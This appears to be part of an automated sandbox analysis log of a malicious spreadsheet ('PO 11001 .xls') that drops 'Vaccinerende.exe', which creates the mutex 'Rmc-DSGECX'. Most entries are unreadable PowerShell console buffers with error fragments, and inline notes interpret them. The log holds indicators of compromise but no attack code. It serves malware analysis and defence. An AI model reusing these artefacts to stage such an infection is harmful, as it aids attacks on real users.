          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR87C5.tmp
          Source: PO 11001 .xlsOLE indicator, Workbook stream: true
          Source: 54230000.0.drOLE indicator, Workbook stream: true
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T........V.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T........V.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............-V.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............:V.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T.......OV.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............\V.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............pV.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............~V.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$................V.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................V.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................V.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................V.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........V.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................V.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................V.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................W.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................W.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............)W.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............;W.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............GW.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............YW.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T.......fW.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......T.......{W.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T........W.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......8Y.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......DY.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......VY.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......bY.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......tY.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......8........Y.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......!Z.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......3Z.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......?Z.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......QZ.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......]Z.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......oZ.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......{Z.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......8........Z.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........[.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........[.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........[.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......<[.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......N[.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......Z[.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......l[.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......x[.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........[.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........[.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......8........[.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........[.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............'\.........................s....................~.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............3\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........G\.........................s.................... .......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............S\.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............f\.........................s....................R.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............r\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s....................R.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$................\.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................].........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................].........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........].........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......<].........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......N].........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......Z].........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......l].........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......x].........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........].........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........].........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........].........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........].........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......t........].........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........].........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................].........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................].........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........^.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............:^.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............L^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............X^.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............j^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............v^.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$................^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: At line:1 char:53 (the same fragment is written many times in this run; each raw entry is the console buffer with every non-printable byte rendered as ".", and the character-dot-character pattern is the UTF-16LE text PowerShell writes, so nothing else in these entries is readable)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: that the path is correct and try again
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: At line:1 char:1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: String) [], CommandNotFoundException
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: At line:1 char:53 (repeated again; the remaining entries in this run carry no readable text)
          Taken together these fragments are the pieces of the standard Windows PowerShell error block for a command that could not be resolved: the "At line:N char:M" position, the "+ ~~~" underline and the "CommandNotFoundException" category. The 32-bit host (SysWOW64) repeatedly wrote an error positioned at char 53 of a one-line command, and the 64-bit host (System32) wrote a CommandNotFoundException positioned at char 1.
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............y..........................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3..................................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............&..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............8..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............D..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............V..........................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............f..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(...............}..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............@..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............M..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..............._..........................s....................~.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............k..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........}..........................s.................... .......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................R.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................R.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............&..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............H..........................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............T..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......f..........................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............r..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............%..........................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............1..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......C..........................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............O..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............a..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............m..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3....... ..........................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............,..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............>..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............J..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............\..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............h..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............z..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3..................................s....................".......h...............
